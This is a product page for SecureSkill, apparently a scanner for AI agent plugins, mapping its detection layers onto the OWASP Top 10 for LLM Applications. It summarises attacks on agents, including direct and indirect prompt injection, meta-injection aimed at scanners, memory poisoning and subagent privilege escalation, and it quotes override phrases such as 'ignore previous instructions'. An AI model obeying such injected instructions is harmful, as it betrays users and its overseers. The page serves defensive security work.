Framework Alignment

OWASP LLM Top 10 Alignment

The OWASP Top 10 for LLM Applications is the most widely referenced security framework for large language model applications. Here is how SecureSkill's multi-layer scan pipeline aligns with each category.

LLM01

Prompt Injection

Full

Manipulating LLMs via crafted inputs can lead to unauthorized access, data breaches, and compromised decision-making.

Attack Categories

prompt_injection_directprompt_injection_indirectscanner_evasion

Pipeline Layers

AI Semantic AnalysisPattern MatchingDeobfuscation Engine

How SecureSkill Detects It

Core strength. Two dedicated attack categories cover direct injection (explicit overrides, role reassignment, "ignore previous instructions") and indirect injection (hidden instructions in documentation, assets, and template files loaded into context). AI semantic analysis examines every file in the skill package for injection patterns. Scanner evasion detection specifically catches meta-injection targeting security tools. The deobfuscation engine strips Unicode tricks that could hide injection payloads.

LLM02

Insecure Output Handling

Partial

Neglecting to validate LLM outputs may lead to downstream security exploits, including code execution that compromises systems and exposes data.

Attack Categories

scope_mismatchmalicious_scripts

Pipeline Layers

AI Semantic AnalysisPattern Matching

How SecureSkill Detects It

SecureSkill scans skill input (what the skill instructs the agent to do), not runtime output (what the agent actually produces). However, scope mismatch and malicious script detection catch skills that instruct agents to produce dangerous outputs such as code execution, file writes to system paths, or network calls with embedded data.

Full LLM02 coverage requires runtime output validation. SecureSkill detects dangerous output instructions at the skill level, but cannot monitor what the agent actually produces during execution.

LLM03

Training Data Poisoning

Partial

Tampered training data can impair LLM models leading to responses that may compromise security, accuracy, or ethical behavior.

Attack Categories

memory_poisoningpersistence_via_promotion

Pipeline Layers

AI Semantic AnalysisPattern Matching

How SecureSkill Detects It

Memory poisoning detection catches skills that seed persistent memory files with manipulated data, effectively poisoning the agent's context across sessions. Promotion detection flags instructions that inject hidden content into persistent agent config files, altering future behavior. Pattern matching rules detect workspace and context poisoning signatures.

SecureSkill addresses agent-level context poisoning (persistent memory, workspace files). Base model training data poisoning is outside the scope of pre-installation skill scanning.

LLM04

Model Denial of Service

Partial

Overloading LLMs with resource-heavy operations can cause service disruptions and increased costs.

Attack Categories

resource_abusescope_mismatchobfuscation

Pipeline Layers

AI Semantic AnalysisPattern MatchingDeobfuscation Engine

How SecureSkill Detects It

Resource abuse detection flags skills that perform legitimate operations at disproportionate scale: loops making network requests, excessive subprocess spawning, and API call volumes far exceeding stated purpose. Scope mismatch catches skills that generate excessive context or recursive prompts. Obfuscation detection identifies encoded payloads that could expand to large sizes, consuming disproportionate processing resources.

Direct model-level DoS (e.g., adversarial inputs designed to maximize inference cost) is outside the scope of skill scanning. SecureSkill detects skill-level resource abuse patterns that could lead to service disruption.

LLM05

Supply Chain Vulnerabilities

Full

Depending upon compromised components, services or datasets undermine system integrity, causing data breaches and system failures.

Attack Categories

supply_chainobfuscation

Pipeline Layers

Pattern MatchingThreat IntelligenceVulnerability DatabaseCredential DetectionAI Semantic AnalysisDeobfuscation Engine

How SecureSkill Detects It

Dedicated supply chain detection covers known malicious package patterns, remote script execution at install time, and mutable remote imports. Real-time threat intelligence checks extracted URLs, domains, and file hashes against active threat feeds. Vulnerability database queries identify known-compromised npm and PyPI dependencies by cross-referencing CVE and advisory databases. Credential detection catches embedded secrets from compromised publishers. AI semantic analysis evaluates publisher metadata, dependency declarations, and version history for suspicious indicators.

LLM06

Sensitive Information Disclosure

Full

Failure to protect against disclosure of sensitive information in LLM outputs can result in legal consequences or a loss of competitive advantage.

Attack Categories

credential_harvestingdata_exfiltration

Pipeline Layers

Credential DetectionAI Semantic AnalysisPattern MatchingAST AnalysisThreat Intelligence

How SecureSkill Detects It

Credential detection scans every file with detectors covering AWS, GCP, Azure, GitHub, and hundreds more services. AI semantic analysis detects instructions to read sensitive files and transmit data externally. Pattern matching rules flag data exfiltration patterns including URL construction with embedded user data, encoded payloads, and network calls with sensitive content. AST-level dataflow tracing follows credential reads from source to network sink. Threat intelligence validates destination URLs against active threat feeds.

LLM07

Insecure Plugin Design

Full

LLM plugins processing untrusted inputs and having insufficient access control risk severe exploits like remote code execution.

Attack Categories

skill_injectionmalicious_scriptsmalicious_hooksscope_mismatchfile_system_abusedata_exfiltrationcredential_harvestingobfuscation

Pipeline Layers

AI Semantic AnalysisPattern MatchingAST AnalysisCredential DetectionThreat IntelligenceVulnerability DatabaseDeobfuscation Engine

How SecureSkill Detects It

This is what SecureSkill does. The entire product is a security scanner for agent plugins (skills). All 20+ attack categories collectively evaluate plugin security: scope mismatch, excessive permissions, dangerous code execution, unauthorized data access, credential exposure, file system abuse, and more. Every layer of the pipeline contributes to a comprehensive pre-installation security assessment of the plugin before it can interact with the agent.

LLM08

Excessive Agency

Full

Granting LLMs unchecked autonomy to take action can lead to unintended consequences, jeopardizing reliability, privacy, and trust.

Attack Categories

scope_mismatchtool_scope_manipulationsubagent_abuse

Pipeline Layers

AI Semantic AnalysisPattern Matching

How SecureSkill Detects It

Scope mismatch detection directly addresses excessive agency by comparing a skill's declared purpose against its actual capabilities and flagging skills that request or exercise permissions far beyond what is needed. Tool scope manipulation catches skills that request tools beyond their stated purpose or attempt to override tool restrictions at runtime. Subagent abuse detection flags skills that spawn sub-agents to bypass parent restrictions or escalate privileges. The permission map output shows exactly what the skill reads, writes, executes, and contacts, making excessive agency visible.

LLM09

Overreliance

Partial

Failing to critically assess LLM outputs can lead to compromised decision making, security vulnerabilities, and legal liabilities.

Attack Categories

trust_exploitationmodel_safety_bypass

Pipeline Layers

Pattern MatchingAI Semantic Analysis

How SecureSkill Detects It

Trust exploitation detection catches fake approval workflows, authority bias patterns ("IMPORTANT SYSTEM UPDATE"), and social engineering that exploits overreliance on the agent's judgment. Dedicated detection rules target approval fatigue induction, technical jargon masking dangerous operations, and urgency exploitation. The trust signals output provides publisher reputation data to help users make informed trust decisions rather than blindly relying on the agent.

Overreliance is fundamentally a human behavioral risk. SecureSkill detects skills designed to exploit user trust, but cannot prevent users from over-trusting legitimate agent outputs.

LLM10

Model Theft

Partial

Unauthorized access to proprietary large language models risks theft, competitive advantage, and dissemination of sensitive information.

Attack Categories

credential_harvesting

Pipeline Layers

Credential DetectionAI Semantic AnalysisPattern Matching

How SecureSkill Detects It

Credential detection specifically identifies API keys for model providers (Anthropic, OpenAI, Google, Azure, and hundreds more), which could enable unauthorized model access. AI semantic analysis detects instructions to harvest or exfiltrate model provider credentials. Pattern matching rules flag credential access patterns targeting provider-specific paths and environment variables.

SecureSkill detects credential theft that could enable unauthorized model access. Broader model theft vectors (weight exfiltration, model reverse engineering, side-channel attacks) are outside the scope of skill scanning.

SecureSkill aligns with the OWASP Top 10 for LLM Applications, providing full coverage for prompt injection, supply chain vulnerabilities, sensitive information disclosure, insecure plugin design, and excessive agency, with partial coverage across the remaining five categories. Coverage is delivered through a multi-layer analysis pipeline: AI semantic analysis across 20+ purpose-built attack categories, comprehensive pattern matching rules, AST-level code analysis, dependency vulnerability scanning, real-time threat intelligence, credential detection, and Unicode deobfuscation.

← Back to SecureSkill